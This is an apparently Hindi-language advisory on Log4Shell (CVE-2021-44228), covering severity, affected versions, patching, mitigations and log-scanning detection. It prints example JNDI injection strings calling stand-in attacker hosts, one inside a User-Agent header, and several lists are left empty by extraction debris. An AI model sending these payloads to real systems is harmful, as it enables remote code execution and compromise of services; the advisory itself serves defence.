
CVE-2021-44228
Apache Log4j 2 में एक गंभीर दूरस्थ कोड निष्पादन भेद्यता, जिसे व्यापक रूप से Log4Shell के नाम से जाना जाता है।
CVE-2021-44228 :contentReference[oaicite:0]{index=0} संस्करण 2.x (2.15.0 से पहले) में एक गंभीर RCE भेद्यता है, जिसे दिसंबर 2021 में खोजा गया था।
यह अप्रमाणित दूरस्थ हमलावरों को कमजोर सिस्टम पर मनमाना कोड निष्पादित करने की अनुमति देता है, केवल विशेष रूप से तैयार किए गए इनपुट भेजकर जो Log4j द्वारा लॉग किया जाता है। यह दोष दुनिया भर में अनगिनत Java-आधारित अनुप्रयोगों और सेवाओं को प्रभावित करता है।
यह भेद्यता लॉग की गई स्ट्रिंग्स में Log4j द्वारा JNDI लुकअप को संभालने से उत्पन्न होती है। एक हमलावर लॉग किए गए संदेश में एक दुर्भावनापूर्ण JNDI संसाधन एम्बेड कर सकता है (जैसे LDAP, DNS), जैसे:
${jndi:ldap://attacker.com/a}
Log4j निम्नलिखित कार्य करेगा:
यह हमलावर को प्रभावित सेवाओं पर पूर्ण रिमोट कोड निष्पादन (RCE) प्राप्त करने देता है।
| मीट्रिक | विवरण |
|---|---|
| CVSS v3.1 बेस स्कोर | 10.0 (गंभीर) |
| आक्रमण वेक्टर | नेटवर्क |
| आवश्यक विशेषाधिकार | कोई नहीं |
| उपयोगकर्ता इंटरैक्शन | कोई नहीं |
| प्रमाणीकरण | आवश्यक नहीं |
| प्रभाव | पूर्ण RCE |
चूँकि Log4j का उपयोग अनगिनत लाइब्रेरी और अनुप्रयोगों में होता है, कोई भी सिस्टम जो अविश्वसनीय डेटा लॉग करता है, कमजोर हो सकता है।
Log4j 2 के निम्नलिखित संस्करण कमजोर हैं:
> = 2.0-beta9 और < 2.15.0
इसके अतिरिक्त, 2.15.0 के कुछ कॉन्फ़िगरेशन अभी भी शोषणीय थे, इसलिए 2.16.0 और बाद के संस्करण सुरक्षित आधार रेखा हैं।
Log4j 2 संस्करणों में अपडेट करें:
2.17.1 या बाद का
बाद के पैच सुरक्षा में और सुधार करते हैं (जैसे 2.17.2, 2.19.0, आदि)।
यदि तत्काल अपग्रेड संभव नहीं है, तो आप:
log4j2.formatMsgNoLookups=true
JndiLookup क्लास हटाएँ:
zip -q -d log4j-core.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
ये कदम जब तक आप अपडेट नहीं कर सकते, तब तक जोखिम को कम करने में मदद करते हैं।



यह भेद्यता शोषण करने में अत्यंत आसान है। हमलावर को केवल एक तैयार स्ट्रिंग भेजनी होती है (जैसे HTTP हैडर, फ़ॉर्म पैरामीटर, चैट संदेश, डेटाबेस फ़ील्ड के माध्यम से) जो एप्लिकेशन द्वारा लॉग की जाती है:
User-Agent: ${jndi:ldap://attacker.example/a}
एक बार लॉग होने के बाद, एप्लिकेशन एक दूरस्थ लुकअप करेगा और उसे हमलावर-नियंत्रित Java कोड निष्पादित करने के लिए मजबूर किया जा सकता है।
Log4Shell का वैश्विक स्तर पर बड़ा प्रभाव पड़ा:
यह दशकों की सबसे महत्वपूर्ण भेद्यताओं में से एक है।
आप कमजोर सिस्टम का पता लगा सकते हैं:
${jndi:) के लिए लॉग स्कैन करके| क्षेत्र | मान |
|---|---|
| CVE ID | CVE-2021-44228 |
| उपनाम | Log4Shell |
| उत्पाद | Apache Log4j 2 |
| गंभीरता | गंभीर (CVSS 10.0) |
| प्रकार | Remote Code Execution |
| प्रभाव | पूर्ण सिस्टम समझौता |
| शोषण-क्षमता | अत्यंत आसान |
| शमन | ≥ 2.17.1 पर पैच करें |
यदि आपका एप्लिकेशन या आपके द्वारा उपयोग की जाने वाली कोई भी लाइब्रेरी Log4j 2.x पर निर्भर है, तो तुरंत एक पैच किए गए संस्करण (≥ 2.17.1) पर अपडेट करें और सत्यापित करें कि JNDI लुकअप अक्षम या हटा दिए गए हैं जहाँ संभव हो।